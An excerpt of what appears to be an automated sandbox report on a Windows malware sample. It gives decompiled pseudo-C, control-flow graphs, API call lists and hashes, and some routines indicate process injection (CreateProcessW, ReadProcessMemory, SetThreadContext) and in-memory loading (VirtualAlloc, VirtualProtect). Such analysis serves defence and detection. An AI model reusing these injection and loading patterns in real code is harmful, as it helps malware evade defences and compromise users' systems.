                  0x0041f1b8
                  0x0041f1c7
                  0x0041f1c9
                  0x0041f1cc
                  0x0041f1e9
                  0x0041f1e9
                  0x0041f1e9
                  0x0041f1ec
                  0x0041f1ef
                  0x0041f1f1
                  0x0041f209
                  0x0041f210
                  0x0041f213
                  0x0041f221
                  0x0041f227
                  0x0041f22c
                  0x0041f1f3
                  0x0041f1f6
                  0x0041f1fc
                  0x0041f200
                  0x0041f200
                  0x0041f234
                  0x0041f236
                  0x0041f236
                  0x0041f23b
                  0x0041f245
                  0x0041f245
                  0x0041f24e
                  0x0041f254
                  0x0041f254
                  0x0041f25a
                  0x0041f260
                  0x0041f26b
                  0x0041f274
                  0x0041f27f
                  0x0041f282
                  0x0041f1ce
                  0x0041f1ce
                  0x0041f1d1
                  0x0041f1d4
                  0x0041f1d9
                  0x0041f1da
                  0x0041f1df
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041f1df
                  0x0041f1e3
                  0x00000000
                  0x00000000
                  0x0041f1e3
                  0x0041f1ba
                  0x0041f1ba
                  0x0041f1c1
                  0x00000000
                  0x00000000
                  0x0041f1c1
                  0x0041f285
                  0x0041f288
                  0x0041f28a
                  0x0041f28d
                  0x0041f28d
                  0x0041f290
                  0x0041f299
                  0x0041f29c
                  0x0041f29f
                  0x0041f2a2
                  0x0041f2ae

                  APIs
                  • EnterCriticalSection.KERNEL32(0044F9D8,?,?,?,0044F9BC,0044F9BC,?,0041F5ED,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 0041F1AA
                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,0044F9BC,0044F9BC,?,0041F5ED,00000004,0042084C,0040C879,0041196D,?,0040CD7B), ref: 0041F200
                  • GlobalHandle.KERNEL32(0068C680), ref: 0041F209
                  • GlobalUnlock.KERNEL32(00000000,?,?,?,0044F9BC,0044F9BC,?,0041F5ED,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 0041F213
                  • GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 0041F22C
                  • GlobalHandle.KERNEL32(0068C680), ref: 0041F23E
                  • GlobalLock.KERNEL32(00000000,?,?,?,0044F9BC,0044F9BC,?,0041F5ED,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 0041F245
                  • LeaveCriticalSection.KERNEL32(?,?,?,?,0044F9BC,0044F9BC,?,0041F5ED,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 0041F24E
                  • GlobalLock.KERNEL32(00000000,?,?,?,0044F9BC,0044F9BC,?,0041F5ED,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 0041F25A
                  • _memset.LIBCMT ref: 0041F274
                  • LeaveCriticalSection.KERNEL32(?), ref: 0041F2A2
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                  • String ID:
                  • API String ID: 496899490-0
                  • Opcode ID: 44d6156ca0fc16f0a1ea0d46616567fa5785abee713f246d0c36fb83f094be5e
                  • Instruction ID: 98b8ad5a6c79ae29f804285d5a9b3c614ea8ac3e30d9a8c0b5193570b51ee080
                  • Opcode Fuzzy Hash: 44d6156ca0fc16f0a1ea0d46616567fa5785abee713f246d0c36fb83f094be5e
                  • Instruction Fuzzy Hash: 2331D071640700AFC720CF65DC89A9BBBF9EF44304B00497EE896D3260DB39F8858B19
                  Uniqueness

                  Uniqueness Score: 1.18%

                  Function 00521980, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 239fileUNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 128 521980-521a2e call 521000 131 521a35-521a5e call 522860 CreateFileW 128->131 134 521a60 131->134 135 521a65-521a78 131->135 136 521bb9-521bbd 134->136 142 521a7a 135->142 143 521a7f-521a99 VirtualAlloc 135->143 138 521c05-521c08 136->138 139 521bbf-521bc3 136->139 144 521c0b-521c12 138->144 140 521bc5-521bc8 139->140 141 521bcf-521bd3 139->141 140->141 145 521be6-521bea 141->145 146 521bd5-521bdf 141->146 142->136 147 521aa0-521aba ReadFile 143->147 148 521a9b 143->148 149 521c67-521c7c 144->149 150 521c14-521c1f 144->150 153 521bec-521bf6 145->153 154 521bfd 145->154 146->145 155 521ac1-521b01 VirtualAlloc 147->155 156 521abc 147->156 148->136 151 521c7e-521c89 VirtualFree 149->151 152 521c8f-521c97 149->152 157 521c23-521c2f 150->157 158 521c21 150->158 151->152 153->154 154->138 159 521b03 155->159 160 521b08-521b23 call 522ab0 155->160 156->136 161 521c43-521c4f 157->161 162 521c31-521c41 157->162 158->149 159->136 168 521b2e-521b38 160->168 164 521c51-521c5a 161->164 165 521c5c-521c62 161->165 163 521c65 162->163 163->144 164->163 165->163 169 521b3a-521b69 call 522ab0 168->169 170 521b6b-521b7f call 5228c0 168->170 169->168 176 521b83-521b87 170->176 177 521b81 170->177 178 521b93-521b97 176->178 179 521b89-521b8d CloseHandle 176->179 177->136 180 521baa-521bb3 178->180 181 521b99-521ba4 VirtualFree 178->181 179->178 180->131 180->136 181->180
                  APIs
                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00521A51
                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00521C89
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.297282519.00521000.00000020.00000001.sdmp, Offset: 00521000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_521000_982.jbxd
                  Similarity
                  • API ID: CreateFileFreeVirtual
                  • String ID: |"R
                  • API String ID: 204039940-2155691742
                  • Opcode ID: 61ae92364ca28658410062bed1a011159a615ec3b8f6d1c7bbb5100bd63cb779
                  • Instruction ID: a106381d7daa29c2b4029a2e24d6ecf773e8d24871b391af8e39177a7f678a78
                  • Opcode Fuzzy Hash: 61ae92364ca28658410062bed1a011159a615ec3b8f6d1c7bbb5100bd63cb779
                  • Instruction Fuzzy Hash: 23A12974E00218EBDB14CFA4D994BEEBBB5BF59304F208599E505BB2C0D7759E80CB98
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0042156B, Relevance: 12.0, APIs: 8, Instructions: 39COMMON
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E0042156B(void* __ecx) {
				int _t5;
				struct HDC__* _t15;
				void* _t17;

				_t17 = __ecx; // executed
				_t5 = GetSystemMetrics(0xb); // executed
				 *(_t17 + 8) = _t5;
				 *((intOrPtr*)(_t17 + 0xc)) = GetSystemMetrics(0xc);
				 *0x44fc10 = GetSystemMetrics(2) + 1;
				 *0x44fc14 = GetSystemMetrics(3) + 1;
				_t15 = GetDC(0);
				 *((intOrPtr*)(_t17 + 0x18)) = GetDeviceCaps(_t15, 0x58);
				 *((intOrPtr*)(_t17 + 0x1c)) = GetDeviceCaps(_t15, 0x5a);
				return ReleaseDC(0, _t15);
			}






                  0x00421578
                  0x0042157a
                  0x0042157e
                  0x00421585
                  0x0042158d
                  0x00421597
                  0x004215a8
                  0x004215b2
                  0x004215ba
                  0x004215c6

                  APIs
                  • GetSystemMetrics.USER32(0000000B), ref: 0042157A
                  • GetSystemMetrics.USER32(0000000C), ref: 00421581
                  • GetSystemMetrics.USER32(00000002), ref: 00421588
                  • GetSystemMetrics.USER32(00000003), ref: 00421592
                  • GetDC.USER32(00000000), ref: 0042159C
                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 004215AD
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004215B5
                  • ReleaseDC.USER32(00000000,00000000), ref: 004215BD
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MetricsSystem$CapsDevice$Release
                  • String ID:
                  • API String ID: 1151147025-0
                  • Opcode ID: c7c1890664744fd191cec8471a3303c8f771b63820afe01bf1e01e85f0efeded
                  • Instruction ID: bfbaa5b229bd2a613bc3f5bc7cad35cca062a458ca99e43de76c0c3162067048
                  • Opcode Fuzzy Hash: c7c1890664744fd191cec8471a3303c8f771b63820afe01bf1e01e85f0efeded
                  • Instruction Fuzzy Hash: D8F049B1E80718BAE7105F72AC4DB167E68FB41761F004426E6048B2C0CBB598208FD0
                  Uniqueness

                  Uniqueness Score: 0.24%

                  Function 004277E2, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44libraryloaderUNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 95%
                  			E004277E2(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t14;
				intOrPtr _t17;
				void* _t18;
				struct HINSTANCE__* _t19;
				void* _t31;
				intOrPtr _t35;
				void* _t36;
				void* _t37;

				_t37 = __eflags;
				_t32 = __edi;
				_t31 = __edx;
				_t25 = __ebx;
				_t11 = SetErrorMode(0); // executed
				SetErrorMode(_t11 | 0x00008001); // executed
				_t14 = E0042083D(__ebx, __edi, SetErrorMode, _t37);
				_t35 = _a4;
				 *((intOrPtr*)(_t14 + 8)) = _t35;
				 *((intOrPtr*)(_t14 + 0xc)) = _t35;
				E0041FFE4(_t14); // executed
				_t17 =  *((intOrPtr*)(E0042083D(__ebx, __edi, _t35, _t37) + 4));
				_t38 = _t17;
				if(_t17 != 0) {
					 *((intOrPtr*)(_t17 + 0x48)) = _a12;
					 *((intOrPtr*)(_t17 + 0x4c)) = _a16;
					 *((intOrPtr*)(_t17 + 0x44)) = _t35;
					E0042764D(_t17, _t31, _t38);
				}
				_t18 = E0042083D(_t25, _t32, _t35, _t38);
				_t39 =  *((char*)(_t18 + 0x14));
				_pop(_t36);
				if( *((char*)(_t18 + 0x14)) == 0) {
					E0041DC8F(_t36, _t39);
				}
				_t19 = GetModuleHandleW(L"user32.dll");
				if(_t19 != 0) {
					 *0x44f5d4 = GetProcAddress(_t19, "NotifyWinEvent");
				}
				return 1;
			}














                  0x004277e2
                  0x004277e2
                  0x004277e2
                  0x004277e2
                  0x004277f0
                  0x004277f8
                  0x004277fa
                  0x004277ff
                  0x00427804
                  0x00427807
                  0x0042780a
                  0x00427814
                  0x00427817
                  0x00427819
                  0x0042781e
                  0x00427824
                  0x00427829
                  0x0042782c
                  0x0042782c
                  0x00427831
                  0x00427836
                  0x0042783a
                  0x0042783b
                  0x0042783d
                  0x0042783d
                  0x00427847
                  0x0042784f
                  0x0042785d
                  0x0042785d
                  0x00427866

                  APIs
                  • SetErrorMode.KERNELBASE(00000000), ref: 004277F0
                  • SetErrorMode.KERNELBASE(00000000), ref: 004277F8
                    • Part of subcall function 0041FFE4: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0042001C
                    • Part of subcall function 0041FFE4: SetLastError.KERNEL32(0000006F), ref: 00420033
                  • GetModuleHandleW.KERNEL32(user32.dll), ref: 00427847
                  • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 00427857
                    • Part of subcall function 0042764D: GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 0042768A
                    • Part of subcall function 0042764D: PathFindExtensionW.SHLWAPI(?), ref: 004276A4
                    • Part of subcall function 0042764D: __wcsdup.LIBCMT ref: 004276EE
                    • Part of subcall function 0042764D: __wcsdup.LIBCMT ref: 0042772D
                    • Part of subcall function 0042764D: __wcsdup.LIBCMT ref: 0042777F
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ErrorModule__wcsdup$FileModeName$AddressExtensionFindHandleLastPathProc
                  • String ID: NotifyWinEvent$user32.dll
                  • API String ID: 3531328582-597752486
                  • Opcode ID: 600bd65f5b6164353d1c9d85679ea76e877092f1a3819f8c30deecd54c82a801
                  • Instruction ID: 19a4000a33e12c2da336ff7ebcaa9982c4ad57cceb2baca74a4ff91e24ba1e1f
                  • Opcode Fuzzy Hash: 600bd65f5b6164353d1c9d85679ea76e877092f1a3819f8c30deecd54c82a801
                  • Instruction Fuzzy Hash: 2B01B1B0B543205FD710BF66A815B5B3AD8AF44710B45806FF84487362DB78C840CBAA
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00521470, Relevance: 9.4, APIs: 6, Instructions: 383processCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 200 521470-521504 call 522a90 * 3 207 521506-521510 200->207 208 52151b 200->208 207->208 210 521512-521519 207->210 209 521522-52153b 208->209 212 521545 209->212 213 52153d-521540 209->213 210->209 215 52154c-521576 CreateProcessW 212->215 214 5218e7-5218e9 213->214 217 521578 215->217 218 52157d-521597 215->218 219 521899-52189d 217->219 225 521599 218->225 226 52159e-5215b9 ReadProcessMemory 218->226 220 5218e5 219->220 221 52189f-5218a3 219->221 220->214 223 5218b5-5218b9 221->223 224 5218a5-5218b1 221->224 227 5218c2-5218c6 223->227 228 5218bb-5218be 223->228 224->223 225->219 229 5215c0-5215c9 226->229 230 5215bb 226->230 234 5218c8-5218cb 227->234 235 5218cf-5218d3 227->235 228->227 231 5215f2-52160e call 522150 229->231 232 5215cb-5215da 229->232 230->219 244 521610 231->244 245 521615-521638 call 522290 231->245 232->231 236 5215dc-5215e4 call 5220a0 232->236 234->235 238 5218e0-5218e3 235->238 239 5218d5-5218db call 5220a0 235->239 243 5215e9-5215eb 236->243 238->214 239->238 243->231 246 5215ed 243->246 244->219 249 52163a-52163e 245->249 250 52167f-5216a0 call 522290 245->250 246->219 252 521640-521671 call 522290 249->252 253 52167a 249->253 256 5216a2 250->256 257 5216a7-5216c5 call 522ab0 250->257 259 521673 252->259 260 521678 252->260 253->219 256->219 263 5216d0-5216da 257->263 259->219 260->250 264 521710-521714 263->264 265 5216dc-52170e call 522ab0 263->265 266 52171a-52172a 264->266 267 5217ff-52181c call 521ca0 264->267 265->263 266->267 269 521730-521740 266->269 276 521820-52183f SetThreadContext 267->276 277 52181e 267->277 269->267 272 521746-52176a 269->272 275 52176d-521771 272->275 275->267 280 521777-52178c 275->280 278 521843-52184e call 521fd0 276->278 279 521841 276->279 277->219 286 521852-521856 278->286 287 521850 278->287 279->219 282 5217a0-5217a4 280->282 284 5217e2-5217fa 282->284 285 5217a6-5217b2 282->285 284->275 288 5217e0 285->288 289 5217b4-5217de 285->289 290 521858-52185c CloseHandle 286->290 291 52185f-521863 286->291 287->219 288->282 289->288 290->291 293 521865-521869 CloseHandle 291->293 294 52186c-521870 291->294 293->294 295 521872-521876 CloseHandle 294->295 296 521879-52187d 294->296 295->296 297 52188a-521893 296->297 298 52187f-521885 call 5220a0 296->298 297->215 297->219 298->297
                  APIs
                  • CreateProcessW.KERNEL32(?,00000000), ref: 00521571
                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 005215B4
                  Memory Dump Source
                  • Source File: 00000004.00000002.297282519.00521000.00000020.00000001.sdmp, Offset: 00521000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_521000_982.jbxd
                  Similarity
                  • API ID: Process$CreateMemoryRead
                  • String ID:
                  • API String ID: 2726527582-0
                  • Opcode ID: 475f0689a72174ff0ae04c85c88f1a3403d427bfc216527feeb2969a55ebaa05
                  • Instruction ID: ef4eb5ce2bba438c125816e868af3b8b6a53bc2135b01745d8b2a0fff60d147c
                  • Opcode Fuzzy Hash: 475f0689a72174ff0ae04c85c88f1a3403d427bfc216527feeb2969a55ebaa05
                  • Instruction Fuzzy Hash: 47F14974E00619EBDB18CF98D885FEEBBB5FF99300F248548E616AB2C0C770A941CB54
                  Uniqueness

                  Uniqueness Score: 5.06%

                  Function 004081A0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 71UNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 300 4081a0-4081a8 301 4081b1-4081bb call 4080a0 300->301 302 4081aa-4081ac 300->302 305 4081c0-4081df 301->305 303 408245-408248 302->303 307 4081e1-4081e3 305->307 308 4081e5-408201 call 4282cd 305->308 307->303 311 408203-408205 308->311 312 408207-40823d call 4281d0 308->312 311->303 316 408243 312->316 317 40823f-408241 312->317 316->303 317->303
                  C-Code - Quality: 50%
                  			E004081A0(void* __ebx, void* __ecx, void* __esi, intOrPtr* _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t27;
				void* _t47;

				if(_a12 != 0) {
					_t17 = E004080A0(__ebx, _t47, __esi, __eflags, L"Crypt32.dll", "CryptStringToBinaryA"); // executed
					_v8 = _t17;
					_t41 = _a12;
					_t19 = _v8(_a12, _a16, 1, 0, _a8, 0, 0);
					__eflags = _t19;
					if(_t19 != 0) {
						 *_a4 = E004282CD(__ebx, _t41, _t47,  *_a8 + 1);
						__eflags =  *_a4;
						if( *_a4 != 0) {
							E004281D0(_t47,  *_a4, 0,  *_a8 + 1);
							_t27 = _v8(_a12, _a16, 1,  *_a4, _a8, 0, 0);
							__eflags = _t27;
							if(_t27 != 0) {
								return 1;
							}
							return 0;
						}
						return 0;
					}
					return 0;
				}
				return 0;
			}








                  0x004081a8
                  0x004081bb
                  0x004081c3
                  0x004081d6
                  0x004081da
                  0x004081dd
                  0x004081df
                  0x004081f9
                  0x004081fe
                  0x00408201
                  0x00408218
                  0x00408238
                  0x0040823b
                  0x0040823d
                  0x00000000
                  0x00408243
                  0x00000000
                  0x0040823f
                  0x00000000
                  0x00408203
                  0x00000000
                  0x004081e1
                  0x00000000

                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID: Crypt32.dll$CryptStringToBinaryA
                  • API String ID: 0-2617671876
                  • Opcode ID: 3c33d3084efd74fc690c6a959d347e19cea363cd6ad14f8d7f53daf797e8e9f0
                  • Instruction ID: 2be41fb62754943cdb2ef28a5bdc4e1b23adf972fd76daa04f5380e5a9e63090
                  • Opcode Fuzzy Hash: 3c33d3084efd74fc690c6a959d347e19cea363cd6ad14f8d7f53daf797e8e9f0
                  • Instruction Fuzzy Hash: 68212970740208BFDB00CF54CD42FAB33A9EF49714F1095ADF945AB381DA7AE9119BA5
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0041FFE4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 318 41ffe4-420024 call 41fee8 GetModuleFileNameW 321 4200d2-4200df call 427dff 318->321 322 42002a-42002f 318->322 323 420031-420039 SetLastError 322->323 324 42003e-420083 call 41ff56 322->324 323->321 329 4200a1-4200a8 324->329 330 420085-420096 call 41ff56 324->330 329->321 332 4200aa-4200bb call 41ff56 329->332 333 42009b 330->333 335 4200c0-4200c9 332->335 333->329 335->321 336 4200cb 335->336 336->321
                  C-Code - Quality: 70%
                  			E0041FFE4(void* __ecx) {
				signed int _v8;
				short _v10;
				short _v12;
				short _v532;
				struct HINSTANCE__* _v536;
				intOrPtr _v544;
				WCHAR* _v556;
				intOrPtr _v560;
				char _v564;
				void* __edi;
				void* __esi;
				signed int _t25;
				intOrPtr _t36;
				intOrPtr _t40;
				struct HINSTANCE__* _t42;
				intOrPtr _t43;
				void* _t45;
				intOrPtr _t46;
				signed int _t50;

				_t48 = _t50;
				_t25 =  *0x44c364; // 0xa6e2bca1
				_v8 = _t25 ^ _t50;
				_t45 = __ecx;
				E0041FEE8();
				_t42 =  *(__ecx + 8);
				_v10 = 0;
				_v12 = 0;
				if(GetModuleFileNameW(_t42,  &_v532, 0x105) != 0) {
					if(_v12 == 0) {
						_v556 =  &_v532;
						_push( &_v564);
						_v564 = 0x20;
						_v560 = 0x88;
						_v544 = 2;
						_v536 = _t42;
						_t30 = E0041FF56(); // executed
						 *(_t45 + 0x80) = _t30;
						if(_t30 == 0xffffffff) {
							_push( &_v564);
							_v544 = 3;
							_t30 = E0041FF56(); // executed
							 *(_t45 + 0x80) = _t30;
						}
						if( *(_t45 + 0x80) == 0xffffffff) {
							_push( &_v564);
							_v544 = 1;
							_t30 = E0041FF56(); // executed
							 *(_t45 + 0x80) = _t30;
							if(_t30 == 0xffffffff) {
								 *(_t45 + 0x80) =  *(_t45 + 0x80) & 0x00000000;
							}
						}
					} else {
						SetLastError(0x6f);
					}
				}
				_pop(_t43);
				_pop(_t46);
				return E00427DFF(_t30, _t36, _v8 ^ _t48, _t40, _t43, _t46);
			}






















                  0x0041ffe7
                  0x0041ffef
                  0x0041fff6
                  0x0041fffb
                  0x0041fffd
                  0x00420002
                  0x00420007
                  0x0042000b
                  0x00420024
                  0x0042002f
                  0x00420044
                  0x00420050
                  0x00420051
                  0x0042005b
                  0x00420065
                  0x0042006f
                  0x00420075
                  0x0042007a
                  0x00420083
                  0x0042008b
                  0x0042008c
                  0x00420096
                  0x0042009b
                  0x0042009b
                  0x004200a8
                  0x004200b0
                  0x004200b1
                  0x004200bb
                  0x004200c0
                  0x004200c9
                  0x004200cb
                  0x004200cb
                  0x004200c9
                  0x00420031
                  0x00420033
                  0x00420033
                  0x0042002f
                  0x004200d5
                  0x004200d8
                  0x004200df

                  APIs
                    • Part of subcall function 0041FEE8: GetModuleHandleW.KERNEL32(KERNEL32,00420002), ref: 0041FEF6
                    • Part of subcall function 0041FEE8: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 0041FF17
                    • Part of subcall function 0041FEE8: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 0041FF29
                    • Part of subcall function 0041FEE8: GetProcAddress.KERNEL32(ActivateActCtx), ref: 0041FF3B
                    • Part of subcall function 0041FEE8: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 0041FF4D
                  • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0042001C
                  • SetLastError.KERNEL32(0000006F), ref: 00420033
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AddressProc$Module$ErrorFileHandleLastName
                  • String ID:
                  • API String ID: 2524245154-3916222277
                  • Opcode ID: d1f6300317608b451b0f1a9f9afcda89f7e431a70b9b6759b68dbed0ea8e864b
                  • Instruction ID: 16c8df534bba0e71afd759dff56f4c83eb178d6d7af711adba3e05cab24aa7f7
                  • Opcode Fuzzy Hash: d1f6300317608b451b0f1a9f9afcda89f7e431a70b9b6759b68dbed0ea8e864b
                  • Instruction Fuzzy Hash: 7E2174709002189AD720DF71E8487EEB7F4FF14324F5046AED069E2191D7785A85DF59
                  Uniqueness

                  Uniqueness Score: 0.52%

                  Function 002C002D, Relevance: 4.9, APIs: 3, Instructions: 392memoryUNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 337 2c002d-2c009e call 2c0467 * 6 350 2c00a7-2c00b0 337->350 351 2c00a0-2c00a2 337->351 350->351 353 2c00b2-2c00b6 350->353 352 2c045f-2c0466 351->352 353->351 354 2c00b8-2c00c2 353->354 355 2c00c4-2c00c7 354->355 356 2c00e6-2c0107 GetNativeSystemInfo 354->356 357 2c00c9-2c00cf 355->357 356->351 358 2c0109-2c0133 VirtualAlloc 356->358 359 2c00d6 357->359 360 2c00d1-2c00d4 357->360 361 2c016c-2c0176 358->361 362 2c0135-2c013d 358->362 365 2c00d9-2c00e4 359->365 360->365 363 2c0178-2c017d 361->363 364 2c01b0-2c01c1 361->364 366 2c013f-2c0142 362->366 367 2c0181-2c0194 363->367 368 2c0240-2c024c 364->368 369 2c01c3-2c01dd 364->369 365->356 365->357 370 2c015d-2c015f 366->370 371 2c0144-2c014c 366->371 373 2c01a5-2c01aa 367->373 374 2c0196-2c019f 367->374 375 2c02fc-2c0306 368->375 376 2c0252-2c0269 368->376 390 2c022e-2c023a 369->390 391 2c01df 369->391 372 2c0161-2c0166 370->372 371->370 377 2c014e-2c0151 371->377 372->366 378 2c0168 372->378 373->367 382 2c01ac 373->382 374->374 379 2c01a1 374->379 380 2c030c-2c0313 375->380 381 2c03c3-2c03d8 call 521900 375->381 376->375 383 2c026f-2c027f 376->383 385 2c0158-2c015b 377->385 386 2c0153-2c0156 377->386 378->361 379->373 387 2c0315-2c031e 380->387 406 2c03da-2c03df 381->406 382->364 388 2c02e1-2c02f2 383->388 389 2c0281-2c0285 383->389 385->372 386->370 386->385 395 2c03b8-2c03bd 387->395 396 2c0324-2c033e 387->396 388->383 393 2c02f8 388->393 397 2c0286-2c0295 389->397 390->369 394 2c023c 390->394 392 2c01e3-2c01e7 391->392 399 2c01e9 392->399 400 2c0207-2c0210 392->400 393->375 394->368 395->381 395->387 401 2c0358-2c035a 396->401 402 2c0340-2c0342 396->402 403 2c029d-2c02a6 397->403 404 2c0297-2c029b 397->404 399->400 409 2c01eb-2c0205 399->409 419 2c0213-2c0228 400->419 407 2c035c-2c035e 401->407 408 2c0373-2c0375 401->408 410 2c034b-2c034e 402->410 411 2c0344-2c0349 402->411 405 2c02cf-2c02d3 403->405 404->403 412 2c02a8-2c02ad 404->412 405->397 420 2c02d5-2c02dd 405->420 415 2c045d 406->415 416 2c03e1-2c03e5 406->416 417 2c0364-2c0366 407->417 418 2c0360-2c0362 407->418 421 2c037c-2c0381 408->421 422 2c0377 408->422 409->419 423 2c0350-2c0356 410->423 411->423 413 2c02af-2c02be 412->413 414 2c02c0-2c02c3 412->414 413->405 414->405 425 2c02c5-2c02cb 414->425 415->352 416->415 426 2c03e7-2c03f1 416->426 417->408 428 2c0368-2c036a 417->428 427 2c0379-2c037a 418->427 419->392 429 2c022a 419->429 420->388 424 2c0384-2c03ae VirtualProtect 421->424 422->427 423->424 424->351 432 2c03b4 424->432 425->405 426->415 430 2c03f3-2c03f7 426->430 427->424 428->424 431 2c036c-2c0371 428->431 429->390 430->415 433 2c03f9-2c040a 430->433 431->424 432->395 433->415 434 2c040c-2c0411 433->434 435 2c0413-2c0420 434->435 435->435 436 2c0422-2c0426 435->436 437 2c043e-2c0444 436->437 438 2c0428-2c043a 436->438 437->415 440 2c0446-2c045c 437->440 438->434 439 2c043c 438->439 439->415 440->415
                  APIs
                  • GetNativeSystemInfo.KERNEL32(?,?,?,?,002C0005), ref: 002C00EB
                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,002C0005), ref: 002C0113
                  Memory Dump Source
                  • Source File: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2c0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocInfoNativeSystemVirtual
                  • String ID:
                  • API String ID: 2032221330-0
